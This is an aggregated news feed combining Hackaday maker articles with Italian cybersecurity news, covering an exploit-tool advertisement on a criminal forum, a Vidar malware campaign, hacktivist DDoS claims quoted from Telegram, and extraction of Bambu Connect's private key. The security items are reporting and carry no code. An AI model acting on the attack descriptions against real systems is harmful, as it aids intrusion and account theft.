Modulathe Is CNC Ready And Will Machine What You Want
Once upon a time, lathes were big heavy machines driven by massive AC motors, hewn out of cast iron and sheer will. Today, we have machine tools of all shapes and sizes, many of which are compact and tidy DIY creations. [Maxim Kachurovskiy]’s Modulathe fits the latter description nicely.
The concept behind the project was simple—this was to be a modular, digital lathe that was open-source and readily buildable on a DIY level, without sacrificing usability. To that end, Modulathe is kitted out to process metal, wooden, and plastic parts, so you can fabricate in whatever material is most appropriate for your needs.
It features a 125 mm chuck and an MT5 spindle, and relies on 15 mm linear rails, 12 mm ball screws, and NEMA23 stepper motors. Because its modular, much of the rest of the design is up to you. You can set it up with pretty much any practical bed length—just choose the right ball screw and rail to achieve it. It’s also set up to work however you like—you can manually operate it, or use it for CNC machining tasks instead.
If you want a small lathe that’s customizable and CNC-ready, this might be the project you’re looking for. We’ve featured some other similar projects in this space, too. Do your research, and explore! If you come up with new grand machine tools of your own design, don’t hesitate to let us know!
Thanks to [mip] for the tip!
Keebin’ with Kristina: the One with the Hardware-Layered Keyboard
You know (or maybe you didn’t), I get super excited when y’all use the links at the bottom of this round-up we call Keebin’ to communicate with your old pal Kristina about your various labors of love. So just remember that.
Case in point: I was typing up this very issue when I heard from [Jay Crutti] and [Marcel Erz]. Both are out there making replacement keyboards for TRS-80s — [Jay] for Models 3 and 4, and [Marcel] for the Model 1. Oooh, I said to myself. This is going at the top.
I think the TRS-80 is probably the one I miss the most. If I still had it, you can bet I would be using [Jay] and [Marcel]’s work to build my own replacement keyboard, which the 40-year-old machine would likely need at this point if the Model 4 is any indication with its failing keyboard contacts.
To create the replacements, [Jay] used Keyboard Layout Editor (KLE), Plate & Case Builder, and EasyEDA. Using the schematic from the maintenance manual, he matched the row/column wiring of the original matrix with Cherry MX footprints. Be sure to check out [Jay]’s site for a link to the project files, or to purchase parts or an assembled keyboard. On the hunt for TRS-80 parts in general? Look no further than [Marcel]’s site.
Keyboards On the Molekula Level
While some focus aesthetically on keyboards, or on comfort, [zzeneg] is simultaneously rocking both and coming up with new keyboard frameworks. Take the open-source Molekula for example.
The big idea with molekula and future keyboards is to have dumb sides and a smart central module that does the braining and the hosting. Additionally, [zzeneg]’s plan is to keep the central PCBs’ footprint under 100 mm² in order to make it more affordable for experimentation. You can see this in the third photo of the gallery.
There are a couple of cool things going on in addition to the modularity — the switch footprints cover pretty much anything you’d want to use, and [zzeneg] left the hot swap sockets exposed around back. This thing is just cool through and through.
Via reddit
The Centerfold: Alice, 1989 Style
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Chicago No. 3
At first glance, the Chicago No. 3 looks a bit like a car that’s missing a bumper. But then you look again and see it sitting on round feet firmly planted behind the frame-less keyboard and think, it might be kind of nice to type on this one. And without that extra iron, it’s probably pretty light and portable, too.
Given all of that, the No. 3 does have an interesting WERTY layout, with the ‘Q’ appearing on the bottom row. So did the model that sold concurrently, the No. 1 (which did have a frame around the keyboard). The base of the No. 3 was slotted, which made it even lighter to carry around.
Additionally, the two models had different ribbon mechanisms. The No. 3 used a 3/8″ ribbon that fed through those vertically-oriented spools, which is something I haven’t seen before. The No. 3 had two additional keys — a Backspace and a Margin Release. Whereas the No. 1 cost $35, the No. 3 went for $50 in early 1900s money (about $1,600 today).
Functionally speaking, the two were quite similar. In addition to both having a WERTY keyboard, they each used a typesleeve — a cylindrical component that can be swapped out, much like the IBM Selectric’s golf ball type element — and a hammer to print. Interestingly enough, in order to use either model, the typist had to turn the safety off by pulling a “hammer extension arm” on the left side before typing. Hopefully, nothing terrible happened if you forgot to do this.
And What Do We Think of Hardware Layers?
Wow. This might actually be a good use of image recognition; I am undecided. It certainly looks cool at first blush, anyway. And I hope it makes a little zhoop! sound in the process of working.
Okay, so, imagine you’re sitting there at your split keyboard and need to mouse or enter some digits real fast. With this number, all you have to do is stretch out your fingers for a second and whoosh — the QWERTY retracts, and in its place comes a 10-key on the left and a mouse on the right.
That’s the power of AutoKeybo. Here, watch the demo video. It’s only nine seconds long.
youtube.com/embed/GXim-IJ4EXc?…
So, let’s start with the obvious. This is supposed to be an ergonomic keyboard, given that you don’t have to move your hand over to mouse. But you do have to rest your arms on a big plastic box that’s two keyboards tall, and that probably isn’t good for you. But it is split, and the sides are angled toward one another, so there’s that.
The cool part is that the trays move independently, so you just stretch out whichever hand is hiding what you need to use real quick. It would be nice to access the mouse without losing the left half of the keyboard. Don’t ask me why, it just would. Just so you wouldn’t have to move both hands.
Okay, so how does it work already? Basically, there’s a built-in camera that detects the splaying of your fingers to trigger the switch. It has a Raspberry Pi 5 doing all of the crunching, which of course you could use as a standalone computer. Here’s a report from someone else who tried it out at CES.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
DIY Strontium Aluminate Glows in the Dark
[Maurycyz] points out right up front: several of the reagents used are very corrosive and can produce toxic gasses. We weren’t sure if they were trying to dissuade us not to replicate it or encourage us to do so. The project in question is making strontium aluminate which, by the way, glows in the dark.
The material grows strongly for hours and, despite the dangers of making it, it doesn’t require anything very exotic. As [Maurycyz] points out, oxygen and aluminum are everywhere. Strontium sounds uncommon, but apparently, it is used in ceramics.
For the chemists among us, there’s an explanation of how to make it by decomposing soluble nitrate salts. For the rest of us, the steps are to make aluminum hydroxide using potassium alum, a food preservative, and sodium hydroxide. Then, it is mixed with nitric acid, strontium carbonate, europium, and dysprosium. Those last elements determine the color of the glow.
A drying step removes the acid, followed by dissolving with urea and water. The heat of the reaction wasn’t enough to form the final product, but it took time with an oxy-propane torch to form blobs of strontium aluminate. The product may not have been pure, because it didn’t glow for hours like commercial preparations. But it did manage to glow for a few minutes after light exposure.
We try to limit our chemistry to less toxic substances, although ferric chloride can make a mess. You could probably track down the impurities with a gas chromatograph. What we really want is a glow-in-the-dark car antenna.
OverFlame Vs Anonymous Italia. Nell’Obiettovo il sito Dell’AISE, Colpito Con Poco Successo
Come riportato di recente, il collettivo italiano di hacker Anonymous Italia ha sferrato un attacco mirato come ritorsione contro le recenti operazioni condotte dal gruppo NoName057(16). L’azione, denominata “dis-CARICA dei 101”, è parte dell’iniziativa più ampia #OpRussia e ha portato al defacing di 101 siti web russi legati ai sistemi di biglietteria online per i trasporti pubblici nella Federazione Russa.
Questa risposta coordinata da Anonymous Italia rappresenta un chiaro messaggio di opposizione agli attacchi informatici condotti da NoName057(16), consolidando il loro impegno all’interno della campagna contro obiettivi strategici russi.
In un’ulteriore escalation, questa mattina il gruppo OverFlame, come contromossa agli attacchi di Anonymous Italia, ha rivendicato un’azione a loro volta, pubblicando il seguente messaggio sul proprio canale Telegram:
Buongiorno, Russia 🇷🇺
Stiamo lanciando una contro-operazione sull'Italia “Defuse 102” in risposta agli attacchi degli hacktivisti italiani. Il primo obiettivo è stato il servizio di sicurezza statale italiano, l'obiettivo è gravemente danneggiato 🔥
Rapporto:
❌check-host.net/check-report/22…
Gloria alla Russia 🇷🇺
Per Kursk ❤️
Per il Donbass ❤️
Per Belgorod ❤️
#OP404
OverFlame|Riserva OverFlame|FORUM|contattaci -> @OverFlame_contact_bot 
L’impatto dell’attacco
Dal link pubblicato all’interno del canale telegram di OverFlame, il sito in questione che avrebbero preso di mira è una pagina dell’Aise e nello specifico sicurezzanazionale.gov.it/web.…. Inoltre tale pagina sembrerebbe non essere la pagina dell’AISE (ed infatti risponde con 404 all’interno del body).
L’AISE è l’acronimo di Agenzia Informazioni e Sicurezza Esterna, il servizio di intelligence italiano responsabile per la sicurezza nazionale nell’ambito delle attività all’estero. L’AISE è una delle due principali agenzie di intelligence in Italia, insieme all’AISI (Agenzia Informazioni e Sicurezza Interna), e fa parte del Sistema di Informazione per la Sicurezza della Repubblica (SISR).
Il sito è sempre risultato perfettamente funzionante pertanto è probabile che solo alcune connessioni siano andate offline, come riporta il ChackHosts pubblicato dal gruppo di hacktivisti filorussi.
OverFlame annuncia una Partner con NoName057(16)
Il gruppo OverFlame, attivo dal gennaio 2025, ha ufficializzato il 16 gennaio una partnership operativa con il collettivo NoName057(16), consolidando una collaborazione mirata a rafforzare le loro azioni congiunte.
Fino a oggi, OverFlame non aveva mai preso di mira obiettivi italiani, rendendo l’attacco attuale un’escalation significativa nelle sue operazioni. Tuttavia, il gruppo si è già distinto per una serie di campagne mirate contro siti web in Lituania, caratterizzati dal dominio nazionale .lt, confermando un focus strategico su obiettivi specifici.
L'articolo OverFlame Vs Anonymous Italia. Nell’Obiettovo il sito Dell’AISE, Colpito Con Poco Successo proviene da il blog della sicurezza informatica.
Time-of-Flight Sensors: How Do They Work?
If you need to measure a distance, it is tempting to reach for the ubiquitous ultrasonic module like an HC-SR04. These work well, and they are reasonably easy to use. However, they aren’t without their problems. So maybe try an IR time of flight sensor. These also work well, are reasonably easy to use, and have a different set of problems. I recently had a project where I needed such a sensor, and I picked up a TF-MiniS, which is a popular IR distance sensor. They aren’t very expensive, and they work serial or I2C. So how did it do?
The unit itself is tiny and has good specifications. You can fit the 42 x 15 x 16 mm module anywhere. It only weighs about five grams — as the manufacturer points out, less than two ping-pong balls. It needs 5 V but communicates using 3.3 V, so integration isn’t much of a problem.
At first glance, the range is impressive. You can read things as close as 10 cm and as far away as 12 m. I found this was a bit optimistic, though. Although the product sometimes gets the name of LiDAR, it doesn’t use a laser. It just uses an IR LED and some fancy optics.
How it Works
The simple explanation for how these sensors work is that they bounce light off a target and measure how long it takes to see the reflection. This is oversimplified, but one thing to keep in mind is that light is fast. To measure a millimeter, you need to measure a difference of less than 7 picoseconds. Light travels 1 mm in 3.3 picoseconds, and then the return flight doubles that.
Because of practical considerations, there are typically a few specialized techniques used. A pulsed sensor turns the illumination on and off and samples pixels to determine the ratio of the overlap in the outbound beam and the reflected light.
It is also possible to sample four measurements on each cycle (that is, four measurements 90 degrees apart) and compute the distance with some fancy trigonometry. TI has a paper that goes into some detail. Or, if you prefer video, they have a video on the topic, too, which you can see below.
youtube.com/embed/TpjnooXhOmY?…
Practical Concerns
Of course, you can’t measure infinitesimally small times, so the sensors are typically blind when you get too close. This sensor claims to be able to read as little as 10 cm. However, if you read closely, you’ll see that if the total distance is under 6 meters, the sensor is only accurate to within plus or minus 6 cm. So at 10 cm, you might read 4 cm to 16 cm, which is a pretty big difference.
Ambient light can affect measurements, too. One thing you might not think about is that it also matters how reflective the target item is. All of these things can reduce the 12-meter range.
You also have to think about the field of view. The further away something is, the larger it needs to be. At 12 meters, for example, the target has to be at least 42 cm on a side to present a big enough target. At 1 meter, a 3.5 cm side will suffice.
The target must also be fairly flat in the field of view. If the sensor sees a partial reflection at one distance and more reflection at a further distance, you’ll get an inaccurate reading. None of these things are insurmountable, of course.
Connecting isn’t hard. You use the red/black wires for 5 V power. A 3.3 V serial port is on the white and green wires: white is the line the unit receives data on. We’ve read that if you hook these up backwards or overvolt them, they’ll die. We didn’t test that.
Code
It is pretty easy to write some MicroPython code to get some readings. You can download the code to try it out. The heart of it is very simple:
while True:
total_distance = 0
valid_samples = 0
for _ in range(NUM_SAMPLES):
distance, strength, _ = get_lidar_data()
if distance >= 0 and strength >= 100: # throw out "weak" values or errors
total_distance += distance
valid_samples += 1 # only count good values
if valid_samples > 0:
print(total_distance / valid_samples)
By default, the device sends data out frequently. If you want to change things, you can and you can even save your setup so that it will continue to operate to your last settings.
The output is two 0x59 bytes followed by the distance (two bytes), the strength (two bytes, LSB), a device temperature (two bytes), and a checksum. All the two-byte values are least-significant byte first.
Commands all start with 0x5A and the length of the packet. Then there’s a command code, any data the command needs, and a checksum. Many of the commands are fixed, so the checksum is already computed in the documentation for you.
Speaking of documentation, if you want to write your own code, you don’t really need the datasheet. You do want the “Product Manual” from the Benewake website. The commands are all in that document. You can switch to a readout in millimeters or centimeters. You can set how often the system sends data. You can also put it in a polling mode. The slowest you can get data is once per second.
In Use
So how did it work? Some informal testing on the bench wasn’t too bad. The error at near distances was within range but pretty bad at about 3 cm. However, it looked relatively constant, so you can account for it in your code. We don’t know if different materials or different sensors would require different offsets, but we’d guess they do.
There was some very small noise in the sensor output, but, honestly, not much. There were no wild results to filter out. Averaging didn’t buy much because the output was pretty stable already.
Conclusion
Like most things, this is a good solution if you need it, but there are other options, and you have to weigh the pros and cons of each method. Of course, you can build your own, which might help you optimize. Sometimes, the ultrasonic sensors are just fine.
Ogni Lunedì Mattina: Allarme PEC! Vidar Malware Torna a Colpire Gli Italiani
Le campagne malware Vidar proseguono con la loro cadenza ormai regolare, riporta il CERT-AgID, le quali prendono di mira gli utenti italiani ogni lunedì mattina.
L’ultima ondata, rilevata nella notte del 20 gennaio 2025, sfrutta nuovamente le PEC compromesse per inviare e-mail esclusivamente ai possessori di caselle PEC, puntando sulla attendibilità di queste comunicazioni per massimizzare il tasso di successo degli attacchi.
Come già osservato in precedenti campagne, anche questa volta gli attori malevoli hanno fatto largo uso della tecnica del Domain Generation Algorithm (DGA) e della rotazione di utilizzo di numerosi host: sono stati rilevati 147 host utilizzati per distribuire il payload sotto forma di file JavaScript.
Queste strategie, sebbene già ampiamente note e sfruttate da tempo, si rivelano sempre efficaci nel complicare il rilevamento e la mitigazione delle campagne. In particolare, le URL generate con DGA ed i percorsi randomizzati restano inattive durante la fase iniziale notturno dell’attacco e si attivano solo nella mattinata successiva, aumentando le difficoltà della prevenzione proattiva.
Le attività di contrasto sono state già messe in atto con il supporto dei Gestori PEC. Gli IoC relativi alla campagna sono stati diramati attraverso il Feed IoC del CERT-AGID verso i Gestori PEC e verso le strutture accreditate.
Si raccomanda di prestare sempre la massima attenzione alle comunicazioni ricevute via PEC, in particolare quando contengono link ritenuti sospetti. Nel dubbio, è sempre possibile inoltrare le email ritenute sospette alla casella di posta malware@cert-agid.gov.it
L'articolo Ogni Lunedì Mattina: Allarme PEC! Vidar Malware Torna a Colpire Gli Italiani proviene da il blog della sicurezza informatica.
Who's who on tech policy in Trump 2.0 administration
WELCOME BACK. THIS IS DIGITAL POLITICS. I'm Mark Scott, and as many of us unpack the impact of Meta's recent decision to roll back its content moderation policies, here's a reminder that Mark Zuckerberg, the company's chief executive, once had an extremely awkward interaction with astronauts. Enjoy.
— Jan 20 marks the start of Donald Trump's second term in the White House. Here are the people you need to know that will shape tech policy over the next four years.
— The 'will they, or won't they' ban on TikTok in the United States is a reminder, to all countries, that you shouldn't mistake national security for digital policymaking.
— In case it wasn't clear, the US dominates the world of 'online platforms.' But countries from Singapore to Turkey are making a play, too.
Let's get started:
Who's who on tech policy in Trump 2.0 administration
WELCOME BACK. THIS IS DIGITAL POLITICS. I'm Mark Scott, and as many of us unpack the impact of Meta's recent decision to roll back its content moderation policies, here's a reminder that Mark Zuckerberg, the company's chief executive, once had an extremely awkward interaction with astronauts. Enjoy.
— Jan 20 marks the start of Donald Trump's second term in the White House. Here are the people you need to know that will shape tech policy over the next four years.
— The 'will they, or won't they' ban on TikTok in the United States is a reminder, to all countries, that you shouldn't mistake national security for digital policymaking.
— In case it wasn't clear, the US dominates the world of 'online platforms.' But countries from Singapore to Turkey are making a play, too.
Let's get started:
You Can Now Play DOOM In Microsoft Word, But You Probably Shouldn’t
DOOM used to primarily run on x86 PCs. It later got ported to a bunch of consoles with middling success, and then everything under the sun, from random embedded systems to PDFs. Now, thanks to [Wojciech Graj], you can even play it in Microsoft Word.
To run DOOM inside Microsoft Word, you must enable VBA macros, and ignore security warnings, to boot. You’ll need a modern version of Word, and it will only work on Windows on an x64 CPU. As you might imagine, too, the *.DOCM file is not exactly lightweight. It comes in at 6.6 MB, no surprise given it contains an entire FPS. It carries inside it a library called doomgeneric_docm.dll and the whole doom1.wad data file. Once the file is opened, a macro then extracts all the game data and executes it.
If you think that Microsoft Word doesn’t really have a way of displaying live game graphics, you’d be correct. Instead, that DLL is creating a bitmap image of the game state for every frame, which is then displayed inside Word itself. It uses the GetAsyncKeyState function to grab inputs from the arrow keys, number keys, and CTRL and space so the player can move around. It certainly sounds convoluted, but it actually runs pretty smoothly given all the fuss.
While this obviously works, you shouldn’t get in the habit of executing random code in your word processor. It’s just not proper, you see, like elbows on the dinner table! And, you know. It’s insecure. So don’t do that.
youtube.com/embed/G3XoOCMnSNg?…
[Thanks to Josiah Gould for the tip!]
Innovative Clock Uses Printed Caustic Lens
Hackers and makers have built just about every kind of clock under the sun. Digital, analog, seven-segment, mechanical seven-segment, binary, ternary, hexadecimal… you name it. It’s been done. You really have to try to find something that shocks us… something we haven’t seen before. [Moritz v. Sivers] has done just that. 
Meet the Caustic Clock. It’s based on the innovative Hollow Clock from [shiura]. It displays time with an hour hand and a minute hand, and that’s all so conventional. But what really caught our eye was the manner in which its dial works. It uses caustics to display the clock dial on a wall as light shines through it.
If you’ve ever seen sunlight reflect through a glass, or the dancing patterns in an outdoor swimming pool, you’ve seen caustics at play. Caustics are the bright patterns we see projected through a transparent object, and if you shape that object properly, you can control them. In this case, [Moritz] used some GitHub code from [Matt Ferraro] to create a caustic projection clockface, and 3D printed it using an SLA printer.
The rest of the clock is straightforward enough—there’s some WS2812 LEDs involved, an Arduino Nano, and even an RP2040. But the real magic is in the light show and how it’s all achieved. We love learning about optics, and this is a beautiful effect well worth studying yourself.
youtube.com/embed/vHKDAkZ5_38?…
“The EvilLoader”: L’Exploit Che Minaccia Telegram e Gli Utenti Android
In un recente post pubblicato sul forum underground XSS.IS, un utente, noto con il nickname “Ancryno”, ha pubblicizzato uno strumento di exploit chiamato “The EvilLoader”. Questo exploit, stando a quanto affermato dall’autore, è progettato per colpire utenti Android attraverso video Telegram manipolati. L’autore sottolinea la possibilità di personalizzare l’exploit in base alle necessità dell’attaccante, rendendolo una minaccia versatile e particolarmente insidiosa. Ma quali sono i dettagli di questa minaccia, e quali potrebbero essere le sue ripercussioni sul panorama della cybersecurity?
Il Contenuto del Post
Il messaggio si apre con un tono autocelebrativo, sottolineando l’impegno dell’autore nel rilasciare nuove tecnologie di exploit. Nello specifico, il post evidenzia le seguenti caratteristiche dell’exploit:
- Compatibilità con tutte le versioni Android di Telegram.
- Funzionalità personalizzabili, inclusa la possibilità di caricare contenuti spoofati e video manipolati.
- Bypass della soddisfazione dell’utente, che suggerisce la capacità di eludere i controlli di sicurezza o mascherare le attività malevole.
Un aspetto particolarmente preoccupante è la dichiarazione che lo strumento può essere utilizzato per:
- Infezioni dei dispositivi Android.
- Furto di sessioni Telegram, con implicazioni dirette sul furto di dati personali e aziendali.
- Creazione di attacchi di phishing personalizzati, sfruttando la piattaforma di Telegram.
Analisi e Implicazioni
Se quanto descritto nel post fosse vero, “The EvilLoader” rappresenterebbe una minaccia altamente sofisticata, soprattutto considerando l’ampio utilizzo di Telegram come piattaforma di messaggistica sia a livello personale che professionale. Gli attaccanti potrebbero sfruttare video apparentemente innocui per veicolare payload malevoli, consentendo l’installazione di malware sui dispositivi delle vittime.
Il furto di sessioni Telegram, in particolare, potrebbe avere conseguenze devastanti. Telegram utilizza un sistema di autenticazione basato su codici inviati via SMS, che, una volta compromesso, potrebbe consentire agli attaccanti di prendere il controllo completo degli account delle vittime. Questo potrebbe portare a:
- Furto di dati sensibili, inclusi messaggi, file condivisi e contatti.
- Accesso a canali e gruppi privati, con conseguenze potenzialmente catastrofiche per organizzazioni che utilizzano Telegram per comunicazioni interne.
- Esecuzione di attacchi secondari, come phishing o spam, sfruttando la fiducia degli altri utenti nei confronti degli account compromessi.
XSS.IS e il Mercato degli Exploit
Il forum XSS.IS è noto per essere un punto di incontro per cybercriminali, hacker e venditori di exploit. Il fatto che strumenti come “The EvilLoader” vengano pubblicizzati su queste piattaforme sottolinea quanto il mercato degli exploit sia florido e in continua evoluzione. Inoltre, l’autore del post fa riferimento a un modello di vendita tramite escrow, che garantisce transazioni sicure tra acquirente e venditore, dimostrando la professionalizzazione di questi ambienti criminali.
Ripercussioni sul Panorama della Cybersecurity
La crescente diffusione di exploit come “The EvilLoader” pone sfide significative per le aziende di cybersecurity e per gli utenti finali. Le principali preoccupazioni includono:
- Aumento degli attacchi mirati: Gli strumenti personalizzabili permettono agli attaccanti di adattare i loro attacchi a specifici bersagli, aumentando l’efficacia delle campagne malevole.
- Compromissione della fiducia nelle piattaforme: Attacchi di questo tipo minano la fiducia degli utenti in piattaforme come Telegram, che sono sempre più utilizzate anche in ambito professionale.
- Evoluzione delle tecniche di difesa: Gli esperti di cybersecurity dovranno sviluppare contromisure più avanzate per identificare e bloccare attacchi veicolati tramite file multimediali apparentemente innocui.
In conclusione il post di “Ancryno” sul forum XSS.IS è un chiaro esempio di come il panorama delle minacce stia evolvendo rapidamente. Strumenti come “The EvilLoader” rappresentano una minaccia concreta non solo per gli utenti individuali, ma anche per le organizzazioni che utilizzano Telegram come piattaforma di comunicazione. È essenziale che gli utenti adottino pratiche di sicurezza adeguate, come l’uso di autenticazione a due fattori e l’aggiornamento regolare delle applicazioni, per mitigare i rischi. Allo stesso tempo, le aziende di cybersecurity devono continuare a monitorare attentamente i forum underground per anticipare e contrastare queste nuove minacce.
L'articolo “The EvilLoader”: L’Exploit Che Minaccia Telegram e Gli Utenti Android proviene da il blog della sicurezza informatica.
Bone Filament, For Printing Practice Bones
Of course there is bone-simulation filament on the market. What’s fun about this Reddit thread is all of the semi-macabre concerns of surgeons who are worried about its properties matching the real thing to make practice rigs for difficult surgeries. We were initially creeped out by the idea, but now that we think about it, it’s entirely reassuring that surgeons have the best tools available for them to prepare, so why not 3D prints of the actual patient’s bones?
[PectusSurgeon] says that the important characteristics were that it doesn’t melt under the bone saw and is mechanically similar, but also that it looks right under x-ray, for fluorscopic surgery training. But at $100 per spool, you would be forgiven for looking around for substitutes. [ghostofwinter88] chimes in saying that their lab used a high-wood-content PLA, but couldn’t say much more, and then got into a discussion of how different bones feel under the saw, before concluding that they eventually chose resin.
Of course, Reddit being Reddit, the best part of the thread is the bad jokes. “Plastic surgery” and “my insurance wouldn’t cover gyroid infill” and so on. We won’t spoil it all for you, so enjoy.
When we first read “printing bones”, we didn’t know if they were discussing making replacement bones, or printing using actual bones in the mix. (Of course we’ve covered both before. This is Hackaday.)
Thanks [JohnU] for the tip!
Robotics Class is Open
If you are like us, you probably just spin up your own code for a lot of simple projects. But that’s wasteful if you are trying to do anything serious. Take a robot, for example. Are you using ROS (Robot Operating System)? If not — or even if you are — check out [Janne Karttunene] and the University of Eastern Finland’s open-source course Robotics and ROS 2 Essentials.
The material is on GitHub. Rather than paraphrase, here’s the description from the course itself:
This course is designed to give you hands-on experience with the basics of robotics using ROS 2 and Gazebo simulation. The exercises focus on the Andino robot from Ekumen and are structured to gradually introduce you to ROS 2 and Docker.No prior experience with ROS 2 or Docker is needed, and since everything runs through Docker, you won’t need to install ROS 2 on your system beforehand. Along the way, you’ll learn essential concepts like autonomous navigation and mapping for mobile robots. All the practical coding exercises are done in Python.
Topics include SLAM, autonomous navigation, odometry, and path planning. It looks like it will be a valuable resource for anyone interested in robotics or anything else you might do with ROS.
If you want a quick introduction to ROS, we can help. We’ve seen a number of cool ROS projects over the years.
Hackaday Links: January 19, 2025
This week, we witnessed a couple of space oopsies as both Starship and New Glenn suffered in-flight mishaps on the same day. SpaceX’s Starship was the more spectacular, with the upper stage of the seventh test flight of the full stack experiencing a “rapid unscheduled disassembly” thanks to a fire developing in the aft section of the stage somewhere over the Turks and Caicos islands, about eight and a half minutes after takeoff from Boca Chica. The good news is that the RUD happened after first-stage separation, and that the Super Heavy booster was not only able to safely return to the pad but also made another successful “chopsticks” landing on the tower. Sorry, that’s just never going to get old.
On the Bezos side of the billionaire rocket club, the maiden flight of Blue Origin’s New Glenn ended with the opposite problem. The upper stage reached orbit, but the reusable booster didn’t make it back to the landing barge parked off the Bahamas. What exactly happened isn’t clear yet, but judging by the telemetry the booster was coming in mighty fast, which may indicate that the engines didn’t restart fully and the thing just broke up when it got into the denser part of the atmosphere.
While we’re not huge fans of doorbell cameras, mainly on privacy grounds but also because paying a monthly fee for service just seems silly, we might reconsider our position after one captured video of a meteorite strike. The impact, which occurred at the Prince Edward Island home of Joe Velaidum, happened back in July but the video was only just released; presumably the delay was for confirmation that the object was indeed a meteorite. Joe’s Ring camera captured video of something yeeting out of the sky and crashing into the sidewalk next to the driveway, in the exact spot he’d been standing only moments before. It’s hard to say if he would have been killed by the impact, but it sure wouldn’t have been fun.
youtube.com/embed/dJJtLtV0Gx4?…
While we’re on space-adjacent topics, we saw an interesting story about a satellite that was knocked out of service for a couple of days thanks to 2024 being a leap year. The Eutelsat OneWeb communications satellite went offline on the last day of the year, apparently because some software wasn’t prepared for the fact that 2024 had 366 days. It’s not clear if this caused any problems with the satellite itself, although the company said the problem was with the “ground segment” so it likely wasn’t. Engineers were able to work through the problem and get it back online within 48 hours, but we’re left wondering how something like this could happen with so many standard libraries out there that specifically deal with leap day calculations.
It’s that time of year again — HOPE_16 is gearing up, and tickets for the August 15-17 conference at St. John’s University in Queens are already on sale. It looks like the Call for Proposals is active now too, so if you’ve got a talk you’d like to give, get going.
And finally, sad news for a hapless early adopter of Bitcoin, whose eleven-year effort to locate a hard drive with 8,000 Bitcoin on it has reached a legal end. Back in 2013, a hard drive owned by James Howells containing the Bitcoin wallet was accidentally disposed of, ending up in a landfill in Newport, Wales. Howells immediately asked for permission to search for the missing fortune, which at the time was worth about $7.5 million. This seems to us like his first mistake; in light of the potential payout, we’d probably have risked a trespassing charge. Howells spent the next couple of years trying to get access while assembling a recovery team, with the effort driven by the ever-increasing price of Bitcoin. Howells also brought suit against the council to get access, an effort that a High Court judge brought to an end last week. So Howells is out of luck, and the hard drive, now worth $765 million, still lies in the landfill.
Dillo Turns 25, and Releases a New Version
The chances are overwhelming, that you are reading this article on a web browser powered by some form of the Blink or WebKit browser engines as used by Google, Apple, and many open source projects, or perhaps the Gecko engine as used by Firefox. At the top end of the web browser world there are now depressingly few maintained browser engines — we think to the detriment of web standards evolution.
Moving away from the big players though, there are several small browser projects which eschew bells and whistles for speed and compactness, and we’re pleased to see that one of the perennial players has released a new version as it passes its quarter century.
Dillo describes itself as ” a fast and small graphical web browser”, and it provides a basic window on the web with a tiny download and the ability to run on very low-end hardware. Without JavaScript and other luxuries it sometimes doesn’t render a site as you’d see it in Chrome or Firefox, but we’re guessing many users would relish some escape from the web’s cycle-sucking garbage. The new version 3.2.0 brings bug fixes, as well as math formula rendering, and navigation improvements.
The special thing about Dillo is that this is a project which came back from the dead. We reported last year how a developer resurrected it after a previous release back in 2015, and it seems that for now at least it has a healthy future. So put it on your retro PC, your original Raspberry Pi, or your Atari if you have one, and try it on your modern desktop if you need reminding just how fast web browsing can be.
This isn’t the only interesting browser project on the block, we’re also keeping an eye on Ladybird, which is aiming for those big players rather than simplicity like Dillo.
Thanks [Feinfinger] for the tip.
Tutto sul ransomware: il commento riga per riga del documento ACN/CSIRT (solo audio)
In questo episodio ho commentato riga per riga un documento di ACN e CSIRT che ripercorre con molta cura tutti gli aspetti più interessanti relativi al ransomware. Sul mio canale YouTube è presente anche il video, per chi volesse seguire il testo del documento.
zerodays.podbean.com/e/tutto-s…
Bambu Connect’s Authentication X.509 Certificate and Private Key Extracted
Hot on the heels of Bambu Lab’s announcement that it would be locking down all network access to its X1-series 3D printers with new firmware, the X.509 certificate and private key from the Bambu Connect application have now been extracted by [hWuxH]. This application was intended to be the sole way for third-party software to send print jobs to Bambu Lab hardware as we previously reported.
The Bambu Connect app is a fairly low-effort Electron-based affair, with some attempt at obfuscation and encryption, but not enough to keep prying eyes out. The de-obfuscated main.js file can be found here, with the certificate and private key clearly visible. These are used to encrypt HTTP traffic with the printer, and is the sole thing standing in the way of tools like OrcaSlicer talking with authentication-enabled Bambu Lab printers.
As for what will be the next steps by Bambu Lab, it’s now clear that security through obfuscation is not going to be very effective here. While playing whack-a-mole with (paying) users who are only interested in using their hardware in the way that they want is certainly an option, this might be a wake-up call for the company that being more forthcoming with their userbase would be in anyone’s best interest.
We await Bambu Lab’s response with bated breath.
An Instant Gratification Game Boy Printer
When the Game Boy Printer was released back in 1998, being able to produce a hard-copy of your Pokémon diploma or your latest Game Boy Camera snapshot at the touch of a button was was pretty slick indeed. But in our modern paperless society, the GB Printer somehow sticks out as even more archaic than the other add-on’s for Nintendo’s iconic handheld. Even among the folks who are still proudly playing the games that support the Printer, nobody actually wants to print anything out — although that doesn’t mean they don’t want to see the images.
The TinyGB Printer, developed by [Raphaël BOICHOT] and [Brian KHUU], could be considered something of a Game Boy Non-Printer. Powered by the RP2040 Zero development board, this open source hardware device plugs into your Game Boy and is picked up by all the games as a legitimate Printer. But instead of cranking out a little slip of thermal paper once you hit the button, the image is displayed in all its 240×240 glory on a 1.3 inch TFT display mounted to the top of the board.
Now, there’s a couple neat things going on here. First of all, because the whole process is digital, [Raphaël] and [Brian] have managed to pull out all the stops and believe they are reproducing these images in the highest fidelity possible. The images are also being simultaneously stored (as PNGs) to a micro SD card on the board, which given the file size of these images, essentially gives you unlimited storage capacity. The documentation says the code might start glitching once you’ve put tens of thousands of images on the card, but surely your sanity would give out before then.
The documentation looks fantastic on this project, and we love the different variations that are possible depending on how you want to build it. For example you can choose to power it with AA or AAA batteries (to match whatever your Game Boy uses), and there’s support for removing the display if you’re more interested in banking the images than viewing them on the go.
If this project seems a bit similar, it’s probably because the duo were involved in the NeoGB Printer we covered back in 2021. Between the two this new version is considerably more polished, and it’s interesting to see how the team has improved on the basic concept over the last few years.
DIY Handheld is an Emulation Powerhouse
If you’re into handheld gaming, you’ve got a wide array of hardware options to choose from these days that are capable of running everything from console classics to full-fledged PC titles. But that doesn’t mean there aren’t enterprising gamers out there who are still building their own custom handhelds — like the Retro Lite CM5.
